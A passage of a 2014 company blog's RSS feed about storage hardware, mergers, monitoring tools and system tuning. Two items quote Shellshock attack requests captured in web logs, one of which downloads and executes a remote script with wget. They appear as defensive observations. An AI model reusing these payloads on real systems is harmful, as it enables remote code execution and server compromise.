      <guid>https://blog.scalability.org/2014/10/massive-unapologetic-firepower-part-2-the-dashboard/</guid>
      <description>For Scalable Informatics Unison product. The whole system:
[ ](/images/dash-2.png)
Watching writes go by:
[ ](/images/dash-3.png)
Note the sustained 40+ GB/s. This is a single rack sinking this data, and no SSDs in the bulk data storage path. This dashboard is part of the day job&amp;rsquo;s FastPath product.</description>
    </item>
    
    <item>
      <title>HP to split up</title>
      <link>https://blog.scalability.org/2014/10/hp-to-split-up/</link>
      <pubDate>Mon, 06 Oct 2014 01:39:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/10/hp-to-split-up/</guid>
      <description>Interesting changes in the corporate M&amp;amp;A; or disaggregation arena. With M&amp;amp;A;, you are looking to build market strength by acquiring valuable IP, assets, brands, names, teams, capabilities, trade secrets, special sauces, etc. You do that to make your group stronger and more capable of handling the challenges ahead. With a disaggregation, you slice off disparate portions of the business, and set them free to pursue their own path. This is what was rumored a few weeks ago with EMC, a possible split of the federated businesses.</description>
    </item>
    
    <item>
      <title>Shellshock is worse than heartbleed</title>
      <link>https://blog.scalability.org/2014/10/shellshock-is-worse-than-heartbleed/</link>
      <pubDate>Wed, 01 Oct 2014 05:39:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/10/shellshock-is-worse-than-heartbleed/</guid>
      <description>In part because, well, the patches don&amp;rsquo;t seem to cover all the exploits. For the gory details, look at the CVE list here. Then cut and paste the local exploits. Even with the latest patched source, built from scratch, there are active working compromises. With heartbleed, all we had to do was nuke keys, patch/update packages, restart machines, cross fingers. This is worse, in that the fixes &amp;hellip; well &amp;hellip; don&amp;rsquo;t.</description>
    </item>
    
    <item>
      <title>... and the shell shock attempts continue ...</title>
      <link>https://blog.scalability.org/2014/09/and-the-shell-shock-attempts-continue/</link>
      <pubDate>Mon, 29 Sep 2014 18:57:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/and-the-shell-shock-attempts-continue/</guid>
      <description>From 174.143.168.121 (174-143-168-121.static.cloud-ips.com)
Request: &#39;() { :;}; /bin/bash -c &amp;quot;wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache&amp;quot;&#39;  </description>
    </item>
    
    <item>
      <title>Updated boot tech in Scalable OS (SIOS)</title>
      <link>https://blog.scalability.org/2014/09/updated-boot-tech-in-scalable-os-sios/</link>
      <pubDate>Mon, 29 Sep 2014 03:42:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/updated-boot-tech-in-scalable-os-sios/</guid>
      <description>This has been an itch we&amp;rsquo;ve been working on scratching a few different ways, and its very much related to forgoing distro based installers. Ok, first the back story. One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn&amp;rsquo;t matter if its RAIDed in hardware/software. Its a pathway that can fail. And when it fails, all hell breaks loose.</description>
    </item>
    
    <item>
      <title>That may be the fastest I&#39;ve seen an exploit go from &#34;theoretical&#34; to &#34;used&#34;</title>
      <link>https://blog.scalability.org/2014/09/that-may-be-the-fastest-ive-seen-an-exploit-go-from-theoretical-to-used/</link>
      <pubDate>Thu, 25 Sep 2014 18:43:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/that-may-be-the-fastest-ive-seen-an-exploit-go-from-theoretical-to-used/</guid>
      <description>Found in our web logs this afternoon. This is bash shellshock.
Request: &#39;() {:;}; /bin/ping -c 1 104.131.0.69&#39;  This bad boy came from the University of Oklahoma, IP address 157.142.200.11 . The ping address 104.131.0.69 is something called shodan.io. Patch this one folks. Remote execution badness, and all that goes along with it.</description>
    </item>
    
    <item>
      <title>Interesting bits around EMC</title>
      <link>https://blog.scalability.org/2014/09/interesting-bits-around-emc/</link>
      <pubDate>Thu, 25 Sep 2014 14:20:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/interesting-bits-around-emc/</guid>
      <description>In the last few days, issues around EMC have become publicly known. EMC is the worlds largest and most profitable storage company, and has a federated group of businesses that are complementary to it. The CEO, Joe Tucci, is stepping down next year, and there is a succession &amp;ldquo;process&amp;rdquo; going on. Couple this to a fundamental shift in storage, from arrays to distributed tightly coupled server storage, such as Unison, which is problematic for their core business.</description>
    </item>
    
    <item>
      <title>sios-metrics code now on github</title>
      <link>https://blog.scalability.org/2014/09/sios-metrics-code-now-on-github/</link>
      <pubDate>Mon, 15 Sep 2014 14:23:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/sios-metrics-code-now-on-github/</guid>
      <description>See link for more details. It allows us to gather many metrics, saves them nicely in the database. This enables very rapid and simple data collection, even for complex data needs.</description>
    </item>
    
    <item>
      <title>Solved the major socket bug ... and it was a layer 8 problem</title>
      <link>https://blog.scalability.org/2014/09/solved-the-major-socket-bug-and-it-was-a-layer-8-problem/</link>
      <pubDate>Sun, 14 Sep 2014 15:52:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/solved-the-major-socket-bug-and-it-was-a-layer-8-problem/</guid>
      <description>I&amp;rsquo;d like to offer an excuse. But I can&amp;rsquo;t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
nc -k -l a.b.c.d 10000  Then I invoked the code. And the data showed up. Without a ()&amp;amp;(&amp;amp;%&amp;amp;$%*&amp;amp;(^ newline. That couldn&amp;rsquo;t possibly be it. Could it? No. Its way to freaking simple.</description>
    </item>
    
    <item>
      <title>New monitoring tool, and a very subtle bug</title>
      <link>https://blog.scalability.org/2014/09/new-monitoring-tool-and-a-very-subtle-bug/</link>
      <pubDate>Sun, 14 Sep 2014 01:31:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/new-monitoring-tool-and-a-very-subtle-bug/</guid>
      <description>I&amp;rsquo;ve been working on coding up some additional monitoring capability, and had an idea a long time ago for a very general monitoring concept. Nothing terribly original, not quite nagios, but something easier to use/deploy. Finally I decided to work on it today. The monitoring code talks to a graphite backend. Could talk to statsd, or other things. In this case, we are using the InfluxDB plugin for graphite. I wanted an insanely simple local data collector.</description>
    </item>
    
    <item>
      <title>New 8TB and 10TB drives from HGST, fit nicely into Unison</title>
      <link>https://blog.scalability.org/2014/09/new-8tb-and-10tb-drives-from-hgst-fit-nicely-into-unison/</link>
      <pubDate>Tue, 09 Sep 2014 23:35:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/new-8tb-and-10tb-drives-from-hgst-fit-nicely-into-unison/</guid>
      <description>The TL;DR version: Imagine 60x 8TB drives (480TB about 1/2 PB) in a 4U unit or 4.8PB in a rack. Now make those 10TB drives. 600TB in 4U. 6PB in a full rack. These are shingled drives, great for &amp;ldquo;cold&amp;rdquo; storage, object storage, etc. One of the many functions that Unison is used for. These aren&amp;rsquo;t really for standard POSIX file systems, as your read-modify-write length is of the order of a GB or so, on a per drive basis.</description>
    </item>
    
    <item>
      <title>The Haswells are (officially) out</title>
      <link>https://blog.scalability.org/2014/09/the-haswells-are-officially-out/</link>
      <pubDate>Tue, 09 Sep 2014 02:03:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/the-haswells-are-officially-out/</guid>
      <description>Great article summarizing information about them here. Of course, everyone and their brother put out press releases indicating that they would be supporting them. Rather than add to that cacophony (ok, just a little: All Scalable Informatics platforms are available with Haswell architecture, more details including benchies &amp;hellip; soon &amp;hellip;) we figured we&amp;rsquo;d let it die down, as the meaningful information will come from real user cases. Haswell is interesting for a number of reasons, not the least of which is 16 DPi/cycle, but fundamentally, its a more efficient/faster chip in many regards.</description>
    </item>
    
    <item>
      <title>Be sure to vote for your favorites in the HPCWire readers choice awards</title>
      <link>https://blog.scalability.org/2014/09/be-sure-to-vote-for-your-favorites-in-the-hpcwire-readers-choice-awards/</link>
      <pubDate>Mon, 08 Sep 2014 21:23:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/be-sure-to-vote-for-your-favorites-in-the-hpcwire-readers-choice-awards/</guid>
      <description>Scalable Informatics is nominated in
 #12 for Best HPC storage product or technology, #20 Top supercomputing achievement which could be for this, this on a single storage box, or this this result , #21 Top 5 new products or technologies to watch for our Unison and #22 for Top 5 vendors to watch  Our friends at Lucera are nominated for #4, Best use of HPC in financial services Please do vote for us and our friends at Lucera!</description>
    </item>
    
    <item>
      <title>InfluxDB cli is up on github</title>
      <link>https://blog.scalability.org/2014/09/influxdb-cli-is-up-on-github/</link>
      <pubDate>Fri, 05 Sep 2014 19:31:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/influxdb-cli-is-up-on-github/</guid>
      <description>I know there is a node version, and I did try it before I wrote my own. Actually, the reason I wrote my own was that I tried it and &amp;hellip; well &amp;hellip; Link is here. And yes, the readme is borked about 1/2 way through. Doesn&amp;rsquo;t quite show the formatting of the output quite right. Will try to fix over the weekend, as I move this a far more feature complete bit.</description>
    </item>
    
    <item>
      <title>Time series databases for metrics part 2</title>
      <link>https://blog.scalability.org/2014/09/time-series-databases-for-metrics-part-2/</link>
      <pubDate>Wed, 03 Sep 2014 20:12:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/time-series-databases-for-metrics-part-2/</guid>
      <description>So I&amp;rsquo;ve been working with influxdb for a while now, and have a working/credible cli for it. I&amp;rsquo;ll have to put it up on github soon. I am using it mostly as a graphite replacement, as its a compiled app versus a python code, and python isn&amp;rsquo;t terribly fast for this sort of work. We want to save lots of data, and do so with 1 second resolution. Imagine I want to save a 64 bit measurement, and I am gathering say 100 per second.</description>
    </item>
    
    <item>
      <title>An article on Detroit that is worth the read</title>
      <link>https://blog.scalability.org/2014/09/an-article-on-detroit-that-is-worth-the-read/</link>
      <pubDate>Wed, 03 Sep 2014 19:46:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/an-article-on-detroit-that-is-worth-the-read/</guid>
      <description>Detroit had filed for bankruptcy protection a while ago. The rationale for this was simple, they simply did not have the cash flow to pay for all their liabilities. They had limited access to debt markets for a number of reasons, and they couldn&amp;rsquo;t keep cranking up the taxes on residents and businesses in the city to generate revenue. They were between a rock and a hard place. I have a soft spot in my heart for Detroit.</description>
    </item>
    
    <item>
      <title>XKCD on thesis defense</title>
      <link>https://blog.scalability.org/2014/08/xkcd-on-thesis-defense/</link>
      <pubDate>Thu, 28 Aug 2014 02:21:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/08/xkcd-on-thesis-defense/</guid>
      <description>I guess I did it wrong &amp;hellip; See here</description>
    </item>
    
    <item>
      <title>Definition of vacation</title>
      <link>https://blog.scalability.org/2014/08/definition-of-vacation/</link>
      <pubDate>Wed, 27 Aug 2014 20:11:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/08/definition-of-vacation/</guid>
      <description>&amp;hellip; appears to be normal working hours from a location that is not your office, home &amp;hellip; I am supposed to be on vacation. A short one, as there are simply far too many things on my plate (notice my recent posting frequency?). Instead, I am trying to solve problems for customers, sign NDAs, handle support calls. What was the purpose of vacation or holiday again? I keep forgetting.</description>
    </item>
    
    <item>
      <title>Have a nice cli for InfluxDB</title>
      <link>https://blog.scalability.org/2014/08/have-a-nice-cli-for-influxdb/</link>
      <pubDate>Fri, 15 Aug 2014 21:34:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/08/have-a-nice-cli-for-influxdb/</guid>
      <description>I tried the nodejs version and &amp;hellip; well &amp;hellip; it was horrible. Basic things didn&amp;rsquo;t work. Made life very annoying. So, being a good engineering type, I wrote my own. It will be up on our site soon. Here&amp;rsquo;s an example
./influxdb-cli.pl --host 192.168.5.117 --user test --pass test --db metrics  metrics&amp;gt; \list series
.----------------------------------. | series name | +----------------------------------+ | lightning.cpuload.avg1 | | lightning.cputotals.idle | | lightning.cputotals.irq | | lightning.</description>
    </item>
    
    <item>
      <title>Scalable Informatics 12 year anniversary</title>
      <link>https://blog.scalability.org/2014/08/scalable-informatics-12-year-anniversary/</link>
      <pubDate>Thu, 14 Aug 2014 15:32:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/08/scalable-informatics-12-year-anniversary/</guid>
      <description>I had forgotten to mention, but we hit our 12 year mark on the 1st of August. We&amp;rsquo;ve grown from a small &amp;ldquo;garage&amp;rdquo; based company (really &amp;ldquo;basement-based&amp;rdquo; in Michigan, as garages aren&amp;rsquo;t heated in winter, nor cooled in summer here), with one guy doing consulting, cluster system builds, tuning, benchmarking, white paper writing &amp;hellip; to a 10 person outfit building the worlds fastest and densest tightly coupled storage and computing systems.</description>
    </item>
    
    <item>
      <title>Time series databases and system metrics</title>
      <link>https://blog.scalability.org/2014/08/time-series-databases-and-system-metrics/</link>
      <pubDate>Thu, 14 Aug 2014 15:24:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/08/time-series-databases-and-system-metrics/</guid>
      <description>I am working on updating our FastPath appliance web management/monitoring gui for the day job. Trying to push data into databases for later analysis. Many tools have been written on the collection side, statsd, fluentd, &amp;hellip; and some are actually pretty cool. The concern for me is the way these tools express their analytical and storage opinions, which is done on the storage side. The data collection side isn&amp;rsquo;t an issue, if anything, its a breath of fresh air relative to what else I&amp;rsquo;ve seen.</description>
    </item>
    
    <item>
      <title>Comcast finally fixed their latency issue</title>
      <link>https://blog.scalability.org/2014/08/comcast-finally-fixed-their-latency-issue/</link>
      <pubDate>Mon, 04 Aug 2014 20:47:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/08/comcast-finally-fixed-their-latency-issue/</guid>
      <description>This has been a point of contention for us for years. Our office has multiple network attachments, using Comcast is part of it. This is the main office, not the home office. Latency on the link, as measured by DNS pings, have always been fairly high, in the multiple 2-3ms region, as compared to our other connection (using a different provider and a different technology) which has been consistently, 0.5ms for the last 2 years.</description>
    </item>
    
    <item>
      <title>π kernel achieved ....</title>
      <link>https://blog.scalability.org/2014/08/kernel-achieved/</link>
      <pubDate>Fri, 01 Aug 2014 16:30:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/08/kernel-achieved/</guid>
      <description>From kernel.org</description>
    </item>
    
    <item>
      <title>Be on the lookout for &#39;pauses&#39; in CentOS/RHEL 6.5 on Sandy Bridge</title>
      <link>https://blog.scalability.org/2014/07/be-on-the-lookout-for-pauses-in-centosrhel-6-5-on-sandy-bridge/</link>
      <pubDate>Thu, 31 Jul 2014 00:25:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/be-on-the-lookout-for-pauses-in-centosrhel-6-5-on-sandy-bridge/</guid>
      <description>Probably on Ivy Bridge as well. Short version. The pauses that plagued Nehalem and Westmere are baaaack. In RHEL/CentOS 6.5 anyway. A customer just ran into one. We helped diagnose/work around this a few years ago when a hedge fund customer ran into this &amp;hellip; then a post-production shop &amp;hellip; then &amp;hellip; Basically the problem came in from the C-states. The deeper the sleep state, in some instances, the processor would not come out of it, or get stuck in the lower levels.</description>
    </item>
    
    <item>
      <title>The best thing one can do with the tuned system is</title>
      <link>https://blog.scalability.org/2014/07/the-best-thing-one-can-do-with-the-tuned-system-is/</link>
      <pubDate>Thu, 31 Jul 2014 00:04:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/the-best-thing-one-can-do-with-the-tuned-system-is/</guid>
      <description>yum remove tuned tuned-utils  This isn&amp;rsquo;t quite as bad as THP, but its close.</description>
    </item>
    
    <item>
      <title>Soon ... 12g goodness in new chassis</title>
      <link>https://blog.scalability.org/2014/07/soon-12g-goodness-in-new-chassis/</link>
      <pubDate>Wed, 30 Jul 2014 16:30:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/soon-12g-goodness-in-new-chassis/</guid>
      <description>This is one of our engineering prototypes that we had to clear space for. A couple of new features I&amp;rsquo;ll talk about soon, but you should know that these are 12g SAS machines (will do 6g SATA of course as well).
 Front of unit:
[ ](/images/IMG_2330.JPG)
Note the new logo/hand bar. The rails are also brand new, and are set to enable easy slide in/out even with 100+ lbs of disk in them.</description>
    </item>
    
    <item>
      <title>Comcast disabled port 25 mail on our business account</title>
      <link>https://blog.scalability.org/2014/07/comcast-disabled-port-25-mail-on-our-business-account/</link>
      <pubDate>Sun, 20 Jul 2014 19:20:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/comcast-disabled-port-25-mail-on-our-business-account/</guid>
      <description>We have a business account at home. I work enough from home that I can easily justify it. Fixed IP, and I run services, mostly to back up my office services. One of those services is SMTP. I&amp;rsquo;ve been running an SMTP server, complete with antispam/antivirus/&amp;hellip; for years. Handles backup for some domains, but is also primary for this site. This is allowable on business accounts. Or it was allowable. 3 days ago, they seem to have turned that off.</description>
    </item>
    
    <item>
      <title>Fantastic lecture from Michael Crichton</title>
      <link>https://blog.scalability.org/2014/07/fantastic-lecture-from-michael-crichton/</link>
      <pubDate>Sat, 19 Jul 2014 13:17:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/fantastic-lecture-from-michael-crichton/</guid>
      <description>This is Michael Crichton of Andromeda Strain, Jurassic park, and other stories. Fantastic story teller, he absolutely nails his subject. The original was on his website, and I grabbed a copy from here. One of the wonderful quotable paragraphs within is this:
A real scientist is, by its own very definition, a skeptic.</description>
    </item>
    
    <item>
      <title>But ... GaAs is the material of the future ... and always will be ...</title>
      <link>https://blog.scalability.org/2014/07/but-gaas-is-the-material-of-the-future-and-always-will-be/</link>
      <pubDate>Fri, 18 Jul 2014 20:05:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/but-gaas-is-the-material-of-the-future-and-always-will-be/</guid>
      <description>I read a note on IBM&amp;rsquo;s recent allocation of capital towards research projects. It had this tidbit in there:
Well, there are a range of III-V materials. Not just GaAs. One of the big issues is the lattice mis-match between SI and many of the III-V material. This strain introduces &amp;ldquo;artifacts&amp;rdquo; in the bandstructure, not to mention structural morphologies. This said, those artifacts may be what the engineers want. Aluminum Phosphate and Gallium Phosphate are pretty well matched to SI.</description>
    </item>
    
    <item>
      <title>Too simple to be wrong</title>
      <link>https://blog.scalability.org/2014/07/too-simple-to-be-wrong/</link>
      <pubDate>Sun, 06 Jul 2014 15:28:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/too-simple-to-be-wrong/</guid>
      <description>I&amp;rsquo;ve been exercising my mad-programming skillz for a while on a variety of things. I got it in my head to port the benchmarks posted on julialang.org to perl a while ago, so I&amp;rsquo;ve been working on this in the background for a few weeks. I also plan, at some point, to rewrite them in q/kdb+, as I&amp;rsquo;ve been really wanting to spend more time with it. The benchmarks aren&amp;rsquo;t hard to rewrite.</description>
    </item>
    
    <item>
      <title>OS and distro as a detail of a VM/container</title>
      <link>https://blog.scalability.org/2014/07/os-and-distro-as-a-detail-of-a-vmcontainer/</link>
      <pubDate>Thu, 03 Jul 2014 22:03:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/os-and-distro-as-a-detail-of-a-vmcontainer/</guid>
      <description>An interesting debate came about on Beowulf list. Basically, someone asked if they could use Gentoo as a distro for building a cluster, after seeing a post from someone whom did something similar. The answer of course is &amp;ldquo;yes&amp;rdquo;, with the more detailed answer being that you use what you need to build the cluster and provide the cycles that you or your users will consume. Hey, look, if someone really, truly wants to run their DOS application, Tiburon/Scalable OS will boot it.</description>
    </item>
    
    <item>
      <title>Scratching my head over a weird bonding issue</title>
      <link>https://blog.scalability.org/2014/07/scratching-my-head-over-a-weird-bonding-issue/</link>
      <pubDate>Thu, 03 Jul 2014 21:50:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/scratching-my-head-over-a-weird-bonding-issue/</guid>
      <description>Trying to set up a channel bond into a 10GbE LAG. Set up bonding module, use the &amp;lsquo;miimon=200 mode=802.3ad&amp;rsquo; options. The switch was sending LACP packets, 1/sec to the NICs. The NICs bond formed. But it didn&amp;rsquo;t seem to negotiate the LACP circuit correctly with the switch. The switch never registered it. I&amp;rsquo;ve not seen that one before. With Mellanox, Arista, Cisco, others like that, the LACP circuit forms correctly and quickly.</description>
    </item>
    
    <item>
      <title>New customers</title>
      <link>https://blog.scalability.org/2014/07/new-customers/</link>
      <pubDate>Thu, 03 Jul 2014 21:45:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/new-customers/</guid>
      <description>We have a number of nice new customers that have been absorbing about all of my time for the last few weeks. This is goodness. One has our current generation FastPath Cadence SSD converged computing and storage system, and will be running kdb+ on it. Another has a 1PB Unison parallel file system, and while we did the previous 2TB write in 73 seconds with it, we did some tuning and tweaking and are down to 68 seconds.</description>
    </item>
    
    <item>
      <title>M&amp;A:  PLX snarfed by ... Avago ?</title>
      <link>https://blog.scalability.org/2014/06/ma-plx-snarfed-by-avago/</link>
      <pubDate>Tue, 24 Jun 2014 14:09:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/06/ma-plx-snarfed-by-avago/</guid>
      <description>Ok, didn&amp;rsquo;t see this acquirer coming, but PLX being bought &amp;hellip; yeah, this makes sense. Avago looks like they are trying to become the glue between systems, whether the glue is a data storage fabric, or communications fabric, etc. PLX makes PCIe switches and other kit. PCIe switch and interconnection is the direction that many are converging to. Best end to end latencies, best per-lane performance, no protocol stack silliness to deal with.</description>
    </item>
    
    <item>
      <title>M&amp;A: SanDisk snarfs FusionIO for $1.1B USD</title>
      <link>https://blog.scalability.org/2014/06/ma-sandisk-snarfs-fusionio-for-1-1b-usd/</link>
      <pubDate>Mon, 16 Jun 2014 16:09:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/06/ma-sandisk-snarfs-fusionio-for-1-1b-usd/</guid>
      <description>This is only the beginning folks &amp;hellip; only the beginning. See this. FusionIO was, quite arguably, in trouble. They needed a buyer to take them to the next level, and to avoid being made completely irrelevant. SanDisk is a natural partner for them. They have the fab and chips, FusionIO has a product. SanDisk has a vision for a flash-only data center. What&amp;rsquo;s interesting about this is that Fusion was sort of the last independent enterprise class PCI Flash vendors.</description>
    </item>
    
    <item>
      <title>Selling inventory to clear space</title>
      <link>https://blog.scalability.org/2014/06/selling-inventory-to-clear-space/</link>
      <pubDate>Wed, 04 Jun 2014 16:50:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/06/selling-inventory-to-clear-space/</guid>
      <description>[Update 16-June] We&amp;rsquo;ve sold the 64 bay FastPath Cadence (siFlash based) , and now we have a few more 60 bay hybrid Ceph and FhGFS units, as well as a 48 bay front mount siFlash. Whats coming in are many of our next gen 60 bay units, with a new backplane design, and we want to start running benchmarks with them ASAP. As we have limited space in our facility, we gotta make hard choices &amp;hellip; Email me (landman@scalableinformatics.</description>
    </item>
    
    <item>
      <title>Divestment: Violin sells off PCIe flash card</title>
      <link>https://blog.scalability.org/2014/05/divestment-violin-sells-off-pcie-flash-card/</link>
      <pubDate>Fri, 30 May 2014 16:52:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/05/divestment-violin-sells-off-pcie-flash-card/</guid>
      <description>This article notes that Violin has divested itself of its PCIe flash card. This card was, to a degree, a shot across the Fusion IO/Virident/Micron bows. I don&amp;rsquo;t think it ever was a significant threat to them though. Terms of the sale indicate about $23M cash and assumptions of $0.5M liabilities, as well as hiring the team. What is interesting is where it was sold. Hynix. Yes, the memory chip/flash maker.</description>
    </item>
    
    <item>
      <title>M&amp;A: Seagate acquires LSI&#39;s flash and accelerated bits from Avago</title>
      <link>https://blog.scalability.org/2014/05/ma-seagate-acquires-lsis-flash-and-accelerated-bits-from-avago/</link>
      <pubDate>Fri, 30 May 2014 14:01:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/05/ma-seagate-acquires-lsis-flash-and-accelerated-bits-from-avago/</guid>
      <description>I&amp;rsquo;ve been saying for a while that M&amp;amp;A; is going to get more intense as companies gird for the battles ahead. I see component vendors looking at doing vertical integration &amp;hellip; not necessarily to compete with their customers, but to offer them alternatives, reference designs, etc. and capture a portion of the higher margin businesses. This move gives Seagate control over Sandforce controllers, and PCIe flash. See this link for more info.</description>
    </item>
    
    <item>
      <title>Massive, unapologetic, firepower: 2TB write in 73 seconds</title>
      <link>https://blog.scalability.org/2014/05/massive-unapologetic-firepower-2tb-write-in-73-seconds/</link>
      <pubDate>Mon, 19 May 2014 20:43:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/05/massive-unapologetic-firepower-2tb-write-in-73-seconds/</guid>
      <description>A 1.2PB single mount point Scalable Informatics Unison system, running an MPI job (io-bm) that just dumps data as fast as the little Infiniband FDR network will allow. Our test case. Write 2TB (2x overall system memory) to disk, across 48 procs. No SSDs in the primary storage. This is just spinning rust, in a single rack. This is performance pr0n, though safe for work.
usn-01:/mnt/fhgfs/test # df -H /mnt/fhgfs/ Filesystem Size Used Avail Use% Mounted on fhgfs_nodev 1.</description>
    </item>
    
    <item>
      <title>Insanity in vendor distros</title>
      <link>https://blog.scalability.org/2014/05/insanity-in-vendor-distros/</link>
      <pubDate>Sun, 18 May 2014 21:17:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/05/insanity-in-vendor-distros/</guid>
      <description>I am not sure if this is specific to SuSE (customer requirement, don&amp;rsquo;t ask), but there is some extreme &amp;hellip; and I really, positively mean, EXTREME &amp;hellip; boneheaded insanity in the dhcp stack in the initrd construction in SuSE. Something that doesn&amp;rsquo;t lend itself well, to, I dunno &amp;hellip; CORRECT AUTOCONFIGURATION OF NETWORK PORTS IN DISKLESS ENVIRONMENTS. Ok, what clued me in was this snippet from the console I&amp;rsquo;ve been struggling with for the past day.</description>
    </item>
    
    <item>
      <title>io-bm released</title>
      <link>https://blog.scalability.org/2014/05/io-bm-released/</link>
      <pubDate>Sun, 18 May 2014 19:01:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/05/io-bm-released/</guid>
      <description>At long last, and yes, I can&amp;rsquo;t believe I let this slip for years &amp;hellip; Its available here at our git site</description>
    </item>
    
    <item>
      <title>Our new look and feel</title>
      <link>https://blog.scalability.org/2014/05/our-new-look-and-feel/</link>
      <pubDate>Wed, 07 May 2014 23:55:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/05/our-new-look-and-feel/</guid>
      <description>Day job website has been updated to something &amp;hellip; modern. Hopefully nothing is broken &amp;hellip; I think it looks great; the Dougs did a terrific job. Seriously, I wound up breaking DNS at the day job (by accident &amp;hellip; really) yesterday, in order to try to rationalize something. Had to roll back our DNS servers to an older code drop. That and I had to spin up a new dedicated mail/dns internal server.</description>
    </item>
    
    <item>
      <title>Building efficient storage and computing platforms has little to do with using cheap hardware</title>
      <link>https://blog.scalability.org/2014/04/building-efficient-storage-and-computing-platforms-has-little-to-do-with-using-cheap-hardware/</link>
      <pubDate>Wed, 30 Apr 2014 15:05:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/building-efficient-storage-and-computing-platforms-has-little-to-do-with-using-cheap-hardware/</guid>
      <description>This has been bugging me for a long time, and we have to address this in every discussion we have. You can&amp;rsquo;t build cost effective scale out systems on cheap-ass hardware designs. Its woefully inefficient, the cost blows up to achieve the type of performance we can achieve often with an order of magnitude fewer systems (hey &amp;hellip; thats less acquisition cost, less TCO, less power/cooling, lower management strain, smaller footprint, tastes great, less filling, &amp;hellip;) The only way people recognize this is when they actually try it themselves.</description>
    </item>
    
    <item>
      <title>M&amp;A: Inktank acquired by Red Hat</title>
      <link>https://blog.scalability.org/2014/04/ma-inktank-acquired-by-red-hat/</link>
      <pubDate>Wed, 30 Apr 2014 15:01:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/ma-inktank-acquired-by-red-hat/</guid>
      <description>I am happy for Sage and team, this is a good exit. Obviously we didn&amp;rsquo;t know this was happening, but I guessed something like this a few weeks ago. Bigger picture: Open source technologies have been capturing mindshare from closed source object, file, and block for a while. This will serve to massively amplify this. GlusterFS was niche until Red Hat bought it. Then it went mainstream. Ceph isn&amp;rsquo;t GlusterFS though.</description>
    </item>
    
    <item>
      <title>When ideology trumps pragmatic design</title>
      <link>https://blog.scalability.org/2014/04/when-ideology-trumps-pragmatic-design/</link>
      <pubDate>Tue, 29 Apr 2014 03:41:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/when-ideology-trumps-pragmatic-design/</guid>
      <description>Real differentiation, adding real value to something, is often hard to do. Fundamental changes often take time, and are often incremental in scope, so they don&amp;rsquo;t break everything. That is, unless you are so completely convinced that your way is better, that you try to force the market in that direction. Sometimes these gambits work. Sometimes they don&amp;rsquo;t. This is about one that did not work. I am convinced my Mac OSX laptop may be the best laptop I&amp;rsquo;ve used.</description>
    </item>
    
    <item>
      <title>busy last two weeks, and lots of traveling next two weeks</title>
      <link>https://blog.scalability.org/2014/04/busy-last-two-weeks-and-lots-of-traveling-next-two-weeks/</link>
      <pubDate>Tue, 29 Apr 2014 03:12:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/busy-last-two-weeks-and-lots-of-traveling-next-two-weeks/</guid>
      <description>We&amp;rsquo;ve been cranking out the products to ship to customers, and I&amp;rsquo;ve been fretting over tests, as usual. And I finished my initial pass at the automated installer. It builds our new Debian based systems very nicely, though there is still a little human interaction. Working on it. And it should work perfectly for all Ubuntu as well. Have an install in Hollywood this week. New market for us, very interesting and it plays completely to our strengths.</description>
    </item>
    
    <item>
      <title>when the networking revolution comes,  the cheap switches will be the first ones against the wall</title>
      <link>https://blog.scalability.org/2014/04/when-the-networking-revolution-comes-the-cheap-switches-will-be-the-first-ones-against-the-wall/</link>
      <pubDate>Tue, 29 Apr 2014 03:04:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/when-the-networking-revolution-comes-the-cheap-switches-will-be-the-first-ones-against-the-wall/</guid>
